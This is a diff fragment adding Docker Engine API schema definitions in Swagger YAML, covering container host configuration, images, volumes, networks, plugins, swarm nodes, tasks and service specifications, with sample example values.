CpuCount: + description: | + The number of usable CPUs (Windows only). + + On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last. + type: "integer" + format: "int64" + CpuPercent: + description: | + The usable percentage of the available CPUs (Windows only). + + On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last. + type: "integer" + format: "int64" + IOMaximumIOps: + description: "Maximum IOps for the container system drive (Windows only)" + type: "integer" + format: "int64" + IOMaximumBandwidth: + description: "Maximum IO in bytes per second for the container system drive (Windows only)" + type: "integer" + format: "int64" + + HostConfig: + description: "Container configuration that depends on the host we are running on" + allOf: + - $ref: "#/definitions/Resources" + - type: "object" + properties: + # Applicable to all platforms + Binds: + type: "array" + description: | + A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + - `host-src:container-dest` to bind-mount a host path into the container. Both `host-src`, and `container-dest` must be an _absolute_ path. + - `host-src:container-dest:ro` to make the bind-mount read-only inside the container. Both `host-src`, and `container-dest` must be an _absolute_ path. + - `volume-name:container-dest` to bind-mount a volume managed by a volume driver into the container. `container-dest` must be an _absolute_ path. + - `volume-name:container-dest:ro` to mount the volume read-only inside the container. `container-dest` must be an _absolute_ path. + items: + type: "string" + ContainerIDFile: + type: "string" + description: "Path to a file where the container ID is written" + LogConfig: + type: "object" + description: "The logging configuration for this container" + properties: + Type: + type: "string" + enum: + - "json-file" + - "syslog" + - "journald" + - "gelf" + - "fluentd" + - "awslogs" + - "splunk" + - "etwlogs" + - "none" + Config: + type: "object" + additionalProperties: + type: "string" + NetworkMode: + type: "string" + description: "Network mode to use for this container. Supported standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to." + PortBindings: + type: "object" + description: "A map of exposed container ports and the host port they should map to." + additionalProperties: + type: "object" + properties: + HostIp: + type: "string" + description: "The host IP address" + HostPort: + type: "string" + description: "The host port number, as a string" + RestartPolicy: + $ref: "#/definitions/RestartPolicy" + AutoRemove: + type: "boolean" + description: "Automatically remove the container when the container's process exits. This has no effect if `RestartPolicy` is set." + VolumeDriver: + type: "string" + description: "Driver that this container uses to mount volumes." + VolumesFrom: + type: "array" + description: "A list of volumes to inherit from another container, specified in the form `[:]`." + items: + type: "string" + Mounts: + description: "Specification for mounts to be added to the container." + type: "array" + items: + $ref: "#/definitions/Mount" + + # Applicable to UNIX platforms + CapAdd: + type: "array" + description: "A list of kernel capabilities to add to the container." + items: + type: "string" + CapDrop: + type: "array" + description: "A list of kernel capabilities to drop from the container." + items: + type: "string" + Dns: + type: "array" + description: "A list of DNS servers for the container to use." + items: + type: "string" + DnsOptions: + type: "array" + description: "A list of DNS options." + items: + type: "string" + DnsSearch: + type: "array" + description: "A list of DNS search domains." + items: + type: "string" + ExtraHosts: + type: "array" + description: | + A list of hostnames/IP mappings to add to the container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + items: + type: "string" + GroupAdd: + type: "array" + description: "A list of additional groups that the container process will run as." + items: + type: "string" + IpcMode: + type: "string" + description: "IPC namespace to use for the container." + Cgroup: + type: "string" + description: "Cgroup to use for the container." + Links: + type: "array" + description: "A list of links for the container in the form `container_name:alias`." + items: + type: "string" + OomScoreAdj: + type: "integer" + description: "An integer value containing the score given to the container in order to tune OOM killer preferences." + PidMode: + type: "string" + description: | + Set the PID (Process) Namespace mode for the container. It can be either: + + - `"container:"`: joins another container's PID namespace + - `"host"`: use the host's PID namespace inside the container + Privileged: + type: "boolean" + description: "Gives the container full access to the host." + PublishAllPorts: + type: "boolean" + description: "Allocates a random host port for all of a container's exposed ports." + ReadonlyRootfs: + type: "boolean" + description: "Mount the container's root filesystem as read only." + SecurityOpt: + type: "array" + description: "A list of string values to customize labels for MLS + systems, such as SELinux." + items: + type: "string" + StorageOpt: + type: "object" + description: | + Storage driver options for this container, in the form `{"size": "120G"}`. + additionalProperties: + type: "string" + Tmpfs: + type: "object" + description: | + A map of container directories which should be replaced by tmpfs mounts, and their corresponding mount options. For example: `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + additionalProperties: + type: "string" + UTSMode: + type: "string" + description: "UTS namespace to use for the container." + UsernsMode: + type: "string" + description: "Sets the usernamespace mode for the container when usernamespace remapping option is enabled." + ShmSize: + type: "integer" + description: "Size of `/dev/shm` in bytes. If omitted, the system uses 64MB." + minimum: 0 + Sysctls: + type: "object" + description: | + A list of kernel parameters (sysctls) to set in the container. For example: `{"net.ipv4.ip_forward": "1"}` + additionalProperties: + type: "string" + Runtime: + type: "string" + description: "Runtime to use with this container." + # Applicable to Windows + ConsoleSize: + type: "array" + description: "Initial console size, as an `[height, width]` array. (Windows only)" + minItems: 2 + maxItems: 2 + items: + type: "integer" + minimum: 0 + Isolation: + type: "string" + description: "Isolation technology of the container. (Windows only)" + enum: + - "default" + - "process" + - "hyperv" + + Config: + description: "Configuration for a container that is portable between hosts" + type: "object" + properties: + Hostname: + description: "The hostname to use for the container, as a valid RFC 1123 hostname." + type: "string" + Domainname: + description: "The domain name to use for the container." + type: "string" + User: + description: "The user that commands are run as inside the container." + type: "string" + AttachStdin: + description: "Whether to attach to `stdin`." + type: "boolean" + default: false + AttachStdout: + description: "Whether to attach to `stdout`." + type: "boolean" + default: true + AttachStderr: + description: "Whether to attach to `stderr`." + type: "boolean" + default: true + ExposedPorts: + description: | + An object mapping ports to an empty object in the form: + + `{"/": {}}` + type: "object" + additionalProperties: + type: "object" + enum: + - {} + default: {} + Tty: + description: "Attach standard streams to a TTY, including `stdin` if it is not closed." + type: "boolean" + default: false + OpenStdin: + description: "Open `stdin`" + type: "boolean" + default: false + StdinOnce: + description: "Close `stdin` after one attached client disconnects" + type: "boolean" + default: false + Env: + description: | + A list of environment variables to set inside the container in the form `["VAR=value", ...]` + type: "array" + items: + type: "string" + Cmd: + description: "Command to run specified as a string or an array of strings." + type: + - "array" + - "string" + items: + type: "string" + Healthcheck: + description: "A test to perform to check that the container is healthy." + type: "object" + properties: + Test: + description: | + The test to perform. Possible values are: + + - `{}` inherit healthcheck from image or parent image + - `{"NONE"}` disable healthcheck + - `{"CMD", args...}` exec arguments directly + - `{"CMD-SHELL", command}` run command with system's default shell + type: "array" + items: + type: "string" + Interval: + description: "The time to wait between checks in nanoseconds. 0 means inherit." + type: "integer" + Timeout: + description: "The time to wait before considering the check to have hung. 0 means inherit." + type: "integer" + Retries: + description: "The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit." + type: "integer" + ArgsEscaped: + description: "Command is already escaped (Windows only)" + type: "boolean" + Image: + description: "The name of the image to use when creating the container" + type: "string" + Volumes: + description: "An object mapping mount point paths inside the container to empty objects." + type: "object" + properties: + additionalProperties: + type: "object" + enum: + - {} + default: {} + WorkingDir: + description: "The working directory for commands to run in." + type: "string" + Entrypoint: + description: | + The entry point for the container as a string or an array of strings. + + If the array consists of exactly one empty string (`[""]`) then the entry point is reset to system default (i.e., the entry point used by docker when there is no `ENTRYPOINT` instruction in the `Dockerfile`). + type: + - "array" + - "string" + items: + type: "string" + NetworkDisabled: + description: "Disable networking for the container." + type: "boolean" + MacAddress: + description: "MAC address of the container." + type: "string" + OnBuild: + description: "`ONBUILD` metadata that were defined in the image's `Dockerfile`." + type: "array" + items: + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + StopSignal: + description: "Signal to stop a container as a string or unsigned integer." + type: "string" + default: "SIGTERM" + StopTimeout: + description: "Timeout to stop a container in seconds." + type: "integer" + default: 10 + Shell: + description: "Shell for when `RUN`, `CMD`, and `ENTRYPOINT` uses a shell." + type: "array" + items: + type: "string" + + NetworkConfig: + description: "TODO: check is correct" + type: "object" + properties: + Bridge: + type: "string" + Gateway: + type: "string" + Address: + type: "string" + IPPrefixLen: + type: "integer" + MacAddress: + type: "string" + PortMapping: + type: "string" + Ports: + type: "array" + items: + $ref: "#/definitions/Port" + + GraphDriver: + description: "Information about this container's graph driver." + type: "object" + properties: + Name: + type: "string" + Data: + type: "object" + additionalProperties: + type: "string" + + Image: + type: "object" + properties: + Id: + type: "string" + RepoTags: + type: "array" + items: + type: "string" + RepoDigests: + type: "array" + items: + type: "string" + Parent: + type: "string" + Comment: + type: "string" + Created: + type: "string" + Container: + type: "string" + ContainerConfig: + $ref: "#/definitions/Config" + DockerVersion: + type: "string" + Author: + type: "string" + Config: + $ref: "#/definitions/Config" + Architecture: + type: "string" + Os: + type: "string" + Size: + type: "integer" + format: "int64" + VirtualSize: + type: "integer" + format: "int64" + GraphDriver: + $ref: "#/definitions/GraphDriver" + RootFS: + type: "object" + properties: + Type: + type: "string" + Layers: + type: "array" + items: + type: "string" + BaseLayer: + type: "string" + + ImageSummary: + type: "object" + required: + - Id + - ParentId + - RepoTags + - RepoDigests + - Created + - Size + - SharedSize + - VirtualSize + - Labels + - Containers + properties: + Id: + type: "string" + x-nullable: false + ParentId: + type: "string" + x-nullable: false + RepoTags: + type: "array" + x-nullable: false + items: + type: "string" + RepoDigests: + type: "array" + x-nullable: false + items: + type: "string" + Created: + type: "integer" + x-nullable: false + Size: + type: "integer" + x-nullable: false + SharedSize: + type: "integer" + x-nullable: false + VirtualSize: + type: "integer" + x-nullable: false + Labels: + type: "object" + x-nullable: false + additionalProperties: + type: "string" + Containers: + x-nullable: false + type: "integer" + + AuthConfig: + type: "object" + properties: + username: + type: "string" + password: + type: "string" + email: + type: "string" + serveraddress: + type: "string" + example: + username: "hannibal" + password: "xxxx" + serveraddress: "https://index.docker.io/v1/" + + ProcessConfig: + type: "object" + properties: + privileged: + type: "boolean" + user: + type: "string" + tty: + type: "boolean" + entrypoint: + type: "string" + arguments: + type: "array" + items: + type: "string" + + Volume: + type: "object" + required: [Name, Driver, Mountpoint, Labels, Scope, Options] + properties: + Name: + type: "string" + description: "Name of the volume." + x-nullable: false + Driver: + type: "string" + description: "Name of the volume driver used by the volume." + x-nullable: false + Mountpoint: + type: "string" + description: "Mount path of the volume on the host." + x-nullable: false + Status: + type: "object" + description: | + Low-level details about the volume, provided by the volume driver. + Details are returned as a map with key/value pairs: + `{"key":"value","key2":"value2"}`. + + The `Status` field is optional, and is omitted if the volume driver + does not support this feature. + additionalProperties: + type: "object" + Labels: + type: "object" + description: "User-defined key/value metadata." + x-nullable: false + additionalProperties: + type: "string" + Scope: + type: "string" + description: "The level at which the volume exists. Either `global` for cluster-wide, or `local` for machine level." + default: "local" + x-nullable: false + enum: ["local", "global"] + Options: + type: "object" + description: "The driver specific options used when creating the volume." + additionalProperties: + type: "string" + UsageData: + type: "object" + required: [Size, RefCount] + properties: + Size: + type: "integer" + description: "The disk space used by the volume (local driver only)" + default: -1 + x-nullable: false + RefCount: + type: "integer" + default: -1 + description: "The number of containers referencing this volume." + x-nullable: false + + example: + Name: "tardis" + Driver: "custom" + Mountpoint: "/var/lib/docker/volumes/tardis" + Status: + hello: "world" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Scope: "local" + + Network: + type: "object" + properties: + Name: + type: "string" + Id: + type: "string" + Created: + type: "string" + format: "dateTime" + Scope: + type: "string" + Driver: + type: "string" + EnableIPv6: + type: "boolean" + IPAM: + $ref: "#/definitions/IPAM" + Internal: + type: "boolean" + Containers: + type: "object" + additionalProperties: + $ref: "#/definitions/NetworkContainer" + Options: + type: "object" + additionalProperties: + type: "string" + Labels: + type: "object" + additionalProperties: + type: "string" + example: + Name: "net01" + Id: "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99" + Created: "2016-10-19T04:33:30.360899459Z" + Scope: "local" + Driver: "bridge" + EnableIPv6: false + IPAM: + Driver: "default" + Config: + - Subnet: "172.19.0.0/16" + Gateway: "172.19.0.1" + Options: + foo: "bar" + Internal: false + Containers: + 19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c: + Name: "test" + EndpointID: "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a" + MacAddress: "02:42:ac:13:00:02" + IPv4Address: "172.19.0.2/16" + IPv6Address: "" + Options: + com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + IPAM: + type: "object" + properties: + Driver: + description: "Name of the IPAM driver to use." + type: "string" + default: "default" + Config: + description: "List of IPAM configuration options, specified as a map: `{\"Subnet\": , \"IPRange\": , \"Gateway\": , \"AuxAddress\": }`" + type: "array" + items: + type: "object" + additionalProperties: + type: "string" + Options: + description: "Driver-specific options, specified as a map." + type: "array" + items: + type: "object" + additionalProperties: + type: "string" + NetworkContainer: + type: "object" + properties: + EndpointID: + type: "string" + MacAddress: + type: "string" + IPv4Address: + type: "string" + IPv6Address: + type: "string" + + BuildInfo: + type: "object" + properties: + id: + type: "string" + stream: + type: "string" + error: + type: "string" + errorDetail: + $ref: "#/definitions/ErrorDetail" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + + CreateImageInfo: + type: "object" + properties: + error: + type: "string" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + + PushImageInfo: + type: "object" + properties: + error: + type: "string" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + ErrorDetail: + type: "object" + properties: + code: + type: "integer" + message: + type: "string" + ProgressDetail: + type: "object" + properties: + code: + type: "integer" + message: + type: "integer" + + ErrorResponse: + description: "Represents an error." + type: "object" + required: ["message"] + properties: + message: + description: "The error message." + type: "string" + x-nullable: false + example: + message: "Something went wrong." + + IdResponse: + description: "Response to an API call that returns just an Id" + type: "object" + required: ["Id"] + properties: + Id: + description: "The id of the newly created object." + type: "string" + x-nullable: false + + EndpointSettings: + description: "Configuration for a network endpoint." + type: "object" + properties: + IPAMConfig: + description: "IPAM configurations for the endpoint" + type: "object" + properties: + IPv4Address: + type: "string" + IPv6Address: + type: "string" + LinkLocalIPs: + type: "array" + items: + type: "string" + Links: + type: "array" + items: + type: "string" + Aliases: + type: "array" + items: + type: "string" + NetworkID: + type: "string" + EndpointID: + type: "string" + Gateway: + type: "string" + IPAddress: + type: "string" + IPPrefixLen: + type: "integer" + IPv6Gateway: + type: "string" + GlobalIPv6Address: + type: "string" + GlobalIPv6PrefixLen: + type: "integer" + format: "int64" + MacAddress: + type: "string" + + PluginMount: + type: "object" + x-nullable: false + required: [Name, Description, Settable, Source, Destination, Type, Options] + properties: + Name: + type: "string" + x-nullable: false + Description: + type: "string" + x-nullable: false + Settable: + type: "array" + items: + type: "string" + Source: + type: "string" + Destination: + type: "string" + x-nullable: false + Type: + type: "string" + x-nullable: false + Options: + type: "array" + items: + type: "string" + + PluginDevice: + type: "object" + required: [Name, Description, Settable, Path] + x-nullable: false + properties: + Name: + type: "string" + x-nullable: false + Description: + type: "string" + x-nullable: false + Settable: + type: "array" + items: + type: "string" + Path: + type: "string" + + PluginEnv: + type: "object" + x-nullable: false + required: [Name, Description, Settable, Value] + properties: + Name: + x-nullable: false + type: "string" + Description: + x-nullable: false + type: "string" + Settable: + type: "array" + items: + type: "string" + Value: + type: "string" + + PluginInterfaceType: + type: "object" + x-nullable: false + required: [Prefix, Capability, Version] + properties: + Prefix: + type: "string" + x-nullable: false + Capability: + type: "string" + x-nullable: false + Version: + type: "string" + x-nullable: false + + Plugin: + description: "A plugin for the Engine API" + type: "object" + required: [Settings, Enabled, Config, Name] + properties: + Id: + type: "string" + Name: + type: "string" + x-nullable: false + Enabled: + description: "True when the plugin is running. False when the plugin is not running, only installed." + type: "boolean" + x-nullable: false + Settings: + description: "Settings that can be modified by users." + type: "object" + x-nullable: false + required: [Args, Devices, Env, Mounts] + properties: + Mounts: + type: "array" + items: + $ref: "#/definitions/PluginMount" + Env: + type: "array" + items: + type: "string" + Args: + type: "array" + items: + type: "string" + Devices: + type: "array" + items: + $ref: "#/definitions/PluginDevice" + PluginReference: + description: "plugin remote reference used to push/pull the plugin" + type: "string" + x-nullable: false + Config: + description: "The config of a plugin." + type: "object" + x-nullable: false + required: + - Description + - Documentation + - Interface + - Entrypoint + - WorkDir + - Network + - Linux + - PropagatedMount + - Mounts + - Env + - Args + properties: + Description: + type: "string" + x-nullable: false + Documentation: + type: "string" + x-nullable: false + Interface: + description: "The interface between Docker and the plugin" + x-nullable: false + type: "object" + required: [Types, Socket] + properties: + Types: + type: "array" + items: + $ref: "#/definitions/PluginInterfaceType" + Socket: + type: "string" + x-nullable: false + Entrypoint: + type: "array" + items: + type: "string" + WorkDir: + type: "string" + x-nullable: false + User: + type: "object" + x-nullable: false + properties: + UID: + type: "integer" + format: "uint32" + GID: + type: "integer" + format: "uint32" + Network: + type: "object" + x-nullable: false + required: [Type] + properties: + Type: + x-nullable: false + type: "string" + Linux: + type: "object" + x-nullable: false + required: [Capabilities, AllowAllDevices, Devices] + properties: + Capabilities: + type: "array" + items: + type: "string" + AllowAllDevices: + type: "boolean" + x-nullable: false + Devices: + type: "array" + items: + $ref: "#/definitions/PluginDevice" + PropagatedMount: + type: "string" + x-nullable: false + Mounts: + type: "array" + items: + $ref: "#/definitions/PluginMount" + Env: + type: "array" + items: + $ref: "#/definitions/PluginEnv" + Args: + type: "object" + x-nullable: false + required: [Name, Description, Settable, Value] + properties: + Name: + x-nullable: false + type: "string" + Description: + x-nullable: false + type: "string" + Settable: + type: "array" + items: + type: "string" + Value: + type: "array" + items: + type: "string" + rootfs: + type: "object" + properties: + type: + type: "string" + diff_ids: + type: "array" + items: + type: "string" + example: + Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078" + Name: "tiborvass/sample-volume-plugin" + Tag: "latest" + Active: true + Settings: + Env: + - "DEBUG=0" + Args: null + Devices: null + Config: + Description: "A sample volume plugin for Docker" + Documentation: "https://docs.docker.com/engine/extend/plugins/" + Interface: + Types: + - "docker.volumedriver/1.0" + Socket: "plugins.sock" + Entrypoint: + - "/usr/bin/sample-volume-plugin" + - "/data" + WorkDir: "" + User: {} + Network: + Type: "" + Linux: + Capabilities: null + AllowAllDevices: false + Devices: null + Mounts: null + PropagatedMount: "/data" + Env: + - Name: "DEBUG" + Description: "If set, prints debug messages" + Settable: null + Value: "0" + Args: + Name: "args" + Description: "command line arguments" + Settable: null + Value: [] + + NodeSpec: + type: "object" + properties: + Name: + description: "Name for the node." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Role: + description: "Role of the node." + type: "string" + enum: + - "worker" + - "manager" + Availability: + description: "Availability of the node." + type: "string" + enum: + - "active" + - "pause" + - "drain" + example: + Availability: "active" + Name: "node-name" + Role: "manager" + Labels: + foo: "bar" + Node: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/NodeSpec" + Description: + type: "object" + properties: + Hostname: + type: "string" + Platform: + type: "object" + properties: + Architecture: + type: "string" + OS: + type: "string" + Resources: + type: "object" + properties: + NanoCPUs: + type: "integer" + format: "int64" + MemoryBytes: + type: "integer" + format: "int64" + Engine: + type: "object" + properties: + EngineVersion: + type: "string" + Labels: + type: "object" + additionalProperties: + type: "string" + Plugins: + type: "array" + items: + type: "object" + properties: + Type: + type: "string" + Name: + type: "string" + example: + ID: "24ifsmvkjbyhk" + Version: + Index: 8 + CreatedAt: "2016-06-07T20:31:11.853781916Z" + UpdatedAt: "2016-06-07T20:31:11.999868824Z" + Spec: + Name: "my-node" + Role: "manager" + Availability: "active" + Labels: + foo: "bar" + Description: + Hostname: "bf3067039e47" + Platform: + Architecture: "x86_64" + OS: "linux" + Resources: + NanoCPUs: 4000000000 + MemoryBytes: 8272408576 + Engine: + EngineVersion: "1.13.0" + Labels: + foo: "bar" + Plugins: + - Type: "Volume" + Name: "local" + - Type: "Network" + Name: "bridge" + - Type: "Network" + Name: "null" + - Type: "Network" + Name: "overlay" + Status: + State: "ready" + Addr: "172.17.0.2" + ManagerStatus: + Leader: true + Reachability: "reachable" + Addr: "172.17.0.2:2377" + SwarmSpec: + description: "User modifiable swarm configuration." + type: "object" + properties: + Name: + description: "Name of the swarm." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Orchestration: + description: "Orchestration configuration." + type: "object" + properties: + TaskHistoryRetentionLimit: + description: "The number of historic tasks to keep per instance or node. If negative, never remove completed or failed tasks." + type: "integer" + format: "int64" + Raft: + description: "Raft configuration." + type: "object" + properties: + SnapshotInterval: + description: "The number of log entries between snapshots." + type: "integer" + format: "int64" + KeepOldSnapshots: + description: "The number of snapshots to keep beyond the current snapshot." + type: "integer" + format: "int64" + LogEntriesForSlowFollowers: + description: "The number of log entries to keep around to sync up slow followers after a snapshot is created." + type: "integer" + format: "int64" + ElectionTick: + description: | + The number of ticks that a follower will wait for a message from the leader before becoming a candidate and starting an election. `ElectionTick` must be greater than `HeartbeatTick`. + + A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed. + type: "integer" + HeartbeatTick: + description: | + The number of ticks between heartbeats. Every HeartbeatTick ticks, the leader will send a heartbeat to the followers. + + A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed. + type: "integer" + Dispatcher: + description: "Dispatcher configuration." + type: "object" + properties: + HeartbeatPeriod: + description: "The delay for an agent to send a heartbeat to the dispatcher." + type: "integer" + format: "int64" + CAConfig: + description: "CA configuration." + type: "object" + properties: + NodeCertExpiry: + description: "The duration node certificates are issued for." + type: "integer" + format: "int64" + ExternalCAs: + description: "Configuration for forwarding signing requests to an external certificate authority." + type: "array" + items: + type: "object" + properties: + Protocol: + description: "Protocol for communication with the external CA (currently only `cfssl` is supported)." + type: "string" + enum: + - "cfssl" + default: "cfssl" + URL: + description: "URL where certificate signing requests should be sent." + type: "string" + Options: + description: "An object with key/value pairs that are interpreted as protocol-specific options for the external CA driver." + type: "object" + additionalProperties: + type: "string" + EncryptionConfig: + description: "Parameters related to encryption-at-rest." + type: "object" + properties: + AutoLockManagers: + description: "If set, generate a key and use it to lock data stored on the managers." + type: "boolean" + TaskDefaults: + description: "Defaults for creating tasks in this cluster." + type: "object" + properties: + LogDriver: + description: | + The log driver to use for tasks created in the orchestrator if unspecified by a service. + + Updating this value will only have an affect on new tasks. Old tasks will continue use their previously configured log driver until recreated. + type: "object" + properties: + Name: + type: "string" + Options: + type: "object" + additionalProperties: + type: "string" + example: + Name: "default" + Orchestration: + TaskHistoryRetentionLimit: 10 + Raft: + SnapshotInterval: 10000 + LogEntriesForSlowFollowers: 500 + HeartbeatTick: 1 + ElectionTick: 3 + Dispatcher: + HeartbeatPeriod: 5000000000 + CAConfig: + NodeCertExpiry: 7776000000000000 + JoinTokens: + Worker: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx" + Manager: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + EncryptionConfig: + AutoLockManagers: false + # The Swarm information for `GET /info`. It is the same as `GET /swarm`, but + # without `JoinTokens`. + ClusterInfo: + type: "object" + properties: + ID: + description: "The ID of the swarm." + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/SwarmSpec" + TaskSpec: + description: "User modifiable task configuration." + type: "object" + properties: + ContainerSpec: + type: "object" + properties: + Image: + description: "The image name to use for the container." + type: "string" + Command: + description: "The command to be run in the image." + type: "array" + items: + type: "string" + Args: + description: "Arguments to the command." + type: "array" + items: + type: "string" + Env: + description: "A list of environment variables in the form `VAR=value`." + type: "array" + items: + type: "string" + Dir: + description: "The working directory for commands to run in." + type: "string" + User: + description: "The user inside the container." + type: "string" + Labels: + description: "User-defined key/value data." + type: "object" + additionalProperties: + type: "string" + TTY: + description: "Whether a pseudo-TTY should be allocated." + type: "boolean" + Mounts: + description: "Specification for mounts to be added to containers created as part of the service." + type: "array" + items: + $ref: "#/definitions/Mount" + StopGracePeriod: + description: "Amount of time to wait for the container to terminate before forcefully killing it." + type: "integer" + format: "int64" + DNSConfig: + description: "Specification for DNS related configurations in resolver configuration file (`resolv.conf`)." + type: "object" + properties: + Nameservers: + description: "The IP addresses of the name servers." + type: "array" + items: + type: "string" + Search: + description: "A search list for host-name lookup." + type: "array" + items: + type: "string" + Options: + description: "A list of internal resolver variables to be modified (e.g., `debug`, `ndots:3`, etc.)." + type: "array" + items: + type: "string" + Resources: + description: "Resource requirements which apply to each individual container created as part of the service." + type: "object" + properties: + Limits: + description: "Define resources limits." + type: "object" + properties: + NanoCPUs: + description: "CPU limit in units of 10-9 CPU shares." + type: "integer" + format: "int64" + MemoryBytes: + description: "Memory limit in Bytes." + type: "integer" + format: "int64" + Reservation: + description: "Define resources reservation." + properties: + NanoCPUs: + description: "CPU reservation in units of 10-9 CPU shares." + type: "integer" + format: "int64" + MemoryBytes: + description: "Memory reservation in Bytes." + type: "integer" + format: "int64" + RestartPolicy: + description: "Specification for the restart policy which applies to containers created as part of this service." + type: "object" + properties: + Condition: + description: "Condition for restart." + type: "string" + enum: + - "none" + - "on-failure" + - "any" + Delay: + description: "Delay between restart attempts." + type: "integer" + format: "int64" + MaxAttempts: + description: "Maximum attempts to restart a given container before giving up (default value is 0, which is ignored)." + type: "integer" + format: "int64" + default: 0 + Window: + description: "Windows is the time window used to evaluate the restart policy (default value is 0, which is unbounded)." + type: "integer" + format: "int64" + default: 0 + Placement: + type: "object" + properties: + Constraints: + description: "An array of constraints." + type: "array" + items: + type: "string" + ForceUpdate: + description: "A counter that triggers an update even if no relevant parameters have been changed." + type: "integer" + Networks: + type: "array" + items: + type: "object" + properties: + Target: + type: "string" + Aliases: + type: "array" + items: + type: "string" + LogDriver: + description: "Specifies the log driver to use for tasks created from this spec. If not present, the default one for the swarm will be used, finally falling back to the engine default if not specified." + type: "object" + properties: + Name: + type: "string" + Options: + type: "object" + additionalProperties: + type: "string" + TaskState: + type: "string" + enum: + - "new" + - "allocated" + - "pending" + - "assigned" + - "accepted" + - "preparing" + - "ready" + - "starting" + - "running" + - "complete" + - "shutdown" + - "failed" + - "rejected" + Task: + type: "object" + properties: + ID: + description: "The ID of the task." + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Name: + description: "Name of the task." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Spec: + $ref: "#/definitions/TaskSpec" + ServiceID: + description: "The ID of the service this task is part of." + type: "string" + Slot: + type: "integer" + NodeID: + description: "The ID of the node that this task is on." + type: "string" + Status: + type: "object" + properties: + Timestamp: + type: "string" + format: "dateTime" + State: + $ref: "#/definitions/TaskState" + Message: + type: "string" + Err: + type: "string" + ContainerStatus: + type: "object" + properties: + ContainerID: + type: "string" + PID: + type: "integer" + ExitCode: + type: "integer" + DesiredState: + $ref: "#/definitions/TaskState" + example: + ID: "0kzzo1i0y4jz6027t0k7aezc7" + Version: + Index: 71 + CreatedAt: "2016-06-07T21:07:31.171892745Z" + UpdatedAt: "2016-06-07T21:07:31.376370513Z" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:31.290032978Z" + State: "running" + Message: "started" + ContainerStatus: + ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035" + PID: 677 + DesiredState: "running" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.10/16" + ServiceSpec: + description: "User modifiable configuration for a service." + properties: + Name: + description: "Name of the service." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + TaskTemplate: + $ref: "#/definitions/TaskSpec" + Mode: + description: "Scheduling mode for the service." + type: "object" + properties: + Replicated: + type: "object" + properties: + Replicas: + type: "integer" + format: "int64" + Global: + type: "object" + UpdateConfig: + description: "Specification for the update strategy of the service." + type: "object" + properties: + Parallelism: + description: "Maximum number of tasks to be updated in one iteration (0 means unlimited parallelism)." + type: "integer" + format: "int64" + Delay: + description: "Amount of time between updates, in nanoseconds." + type: "integer" + format: "int64" + FailureAction: + description: "Action to take if an updated task fails to run, or stops running during the update." + type: "string" + enum: + - "continue" + - "pause" + Monitor: + description: "Amount of time to monitor each updated task for failures, in nanoseconds." 